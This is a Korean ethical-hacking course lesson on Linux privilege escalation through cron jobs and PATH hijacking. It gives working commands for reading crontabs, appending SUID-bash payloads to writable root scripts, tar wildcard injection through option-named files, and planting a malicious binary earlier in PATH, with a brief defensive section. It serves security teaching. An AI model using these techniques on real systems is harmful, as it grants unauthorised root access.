Cron 작업과 PATH
예약 작업 악용
Cron 작업과 PATH은(는) CoddyKit의 무료 Ethical Hacking Academy 강의입니다. 이것은 4개 중 3번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Ethical Hacking Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Ethical Hacking Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
공격 경로로서의 Cron 작업
cron 데몬은 예약된 작업을 실행하며, root 권한으로 실행되는 경우가 많습니다. root cron 작업이 실행하는 대상(스크립트, 입력 또는 명령을 찾는 방식)에 영향을 줄 수 있다면 root 권한으로 코드를 실행할 수 있습니다.
Cron 열거
시스템 crontab과 cron 디렉터리를 읽으십시오. 각 작업을 실행하는 사용자와 해당 작업이 호출하는 스크립트를 기록하십시오.
cat /etc/crontab
ls -la /etc/cron.d /etc/cron.daily /etc/cron.hourly
cat /var/spool/cron/crontabs/* 2>/dev/null숨겨진 작업 감시
일부 작업은 눈에 띄는 파일에 존재하지 않습니다. pspy는 root 권한 없이 프로세스 생성을 모니터링하여 cron 명령이 실행되는 순간을 보여 줍니다. 구성 파일을 읽을 수 없는 작업도 확인할 수 있습니다.
./pspy64
# watch for periodic root processes쓰기 가능한 크론 스크립트
가장 간단한 악용 방법은 다음과 같습니다. 루트의 크론 작업이 사용자가 쓸 수 있는 스크립트를 실행할 때, 페이로드를 덧붙이고 다음 실행을 기다리면 됩니다.
ls -la /opt/backup.sh # -rwxrwxrwx root
echo "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash" >> /opt/backup.sh와일드카드 주입
사용자가 제어하는 디렉터리에서 루트의 크론 작업이 tar -czf backup.tar.gz *처럼 와일드카드를 사용한다면, 이름이 명령줄 옵션처럼 동작하는 파일을 만들 수 있습니다(인수 주입). 그러면 tar가 사용자의 명령을 실행하게 만들 수 있습니다.
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
echo "cp /bin/bash /tmp/rb; chmod +s /tmp/rb" > shell.shPATH란 무엇인가요?
PATH는 셸이 명령을 검색하는 디렉터리 목록입니다. 스크립트가 명령을 전체 경로 없이 이름만으로 호출하면(예: /usr/bin/backup 대신 backup), PATH에서 일치하는 첫 번째 파일이 실행됩니다.
echo $PATH
# /usr/local/bin:/usr/bin:/binPATH 하이재킹
루트로 실행되는 스크립트가 명령을 절대 경로 없이 호출하고, 사용자가 쓰기 가능한 디렉터리를 PATH 앞에 추가할 수 있다면 해당 이름의 악성 바이너리를 그곳에 배치하십시오. 그러면 루트가 사용자의 버전을 실행합니다.
echo -e "#!/bin/bash\ncp /bin/bash /tmp/rb; chmod +s /tmp/rb" > /tmp/backup
chmod +x /tmp/backup
export PATH=/tmp:$PATHSUID 바이너리의 상대 경로
전체 경로 없이 system("service ...")를 호출하는 사용자 지정 SUID 바이너리에서도 같은 결함이 나타납니다. PATH를 하이재킹하면 사용자의 코드가 루트 권한으로 실행됩니다 — 이는 PATH 악용과 SUID 개념을 결합한 방법입니다.
쓰기 가능한 PATH 디렉터리 악용
PATH를 변경하지 않더라도, 기존 PATH 디렉터리(예: /usr/local/bin)에 쓸 수 있고 루트 작업이 그곳의 명령을 호출한다면 해당 위치에 바이너리를 넣기만 하면 됩니다.
ls -ld /usr/local/bin # check for write permission공격 타이밍 맞추기
크론 기반 권한 상승에는 인내심이 필요합니다 — 예약된 실행 시각까지 기다려야 합니다. 간격을 확인하고, 페이로드를 배치한 다음, 작업이 실행된 뒤 결과(예: SUID 셸)를 확인하십시오.
watch -n 5 ls -la /tmp/rootbash방어와 윤리
방어자는 스크립트에서 절대 경로를 사용하고, 크론 스크립트와 해당 디렉터리의 권한을 제한하며, 공격자가 제어할 수 있는 경로에서 와일드카드를 사용하지 말고, 크론 내부에 안전한 PATH를 설정해야 합니다. 이러한 기법은 권한이 부여된 환경에서만 테스트하십시오.
빠른 확인
크론과 PATH에 관한 지식을 테스트해 보십시오.
복습
크론과 PATH를 이용한 권한 상승을 배웠습니다.
- 쓰기 가능한 스크립트를 호출하거나 와일드카드를 사용하는 루트 크론 작업은 악용할 수 있습니다
- pspy 도구는 숨겨진 예약 프로세스를 보여 줍니다
- PATH 하이재킹은 절대 경로 없이 호출된 명령을 악용합니다
- 페이로드를 배치하고 예약 실행을 기다린 뒤 루트 권한을 확보합니다
다음 주제: 커널 익스플로잇입니다.
자주 묻는 질문
“Cron 작업과 PATH” 강의는 무료인가요?
네 — “Cron 작업과 PATH” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Ethical Hacking Academy 강의 전체를 잠금 해제할 수 있습니다. Ethical Hacking Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
“Cron 작업과 PATH”에서 뭘 배우나요?
예약 작업 악용 브라우저에서 직접 실행하는 실습 코드로 Ethical Hacking Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Ethical Hacking Academy을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Ethical Hacking Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 3번째 강의입니다.
“Cron 작업과 PATH” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Ethical Hacking Academy 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Ethical Hacking Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.
이 강의의 모든 강의
- 열거
- SUID와 Sudo 악용
- Cron 작업과 PATH
- 커널 익스플로잇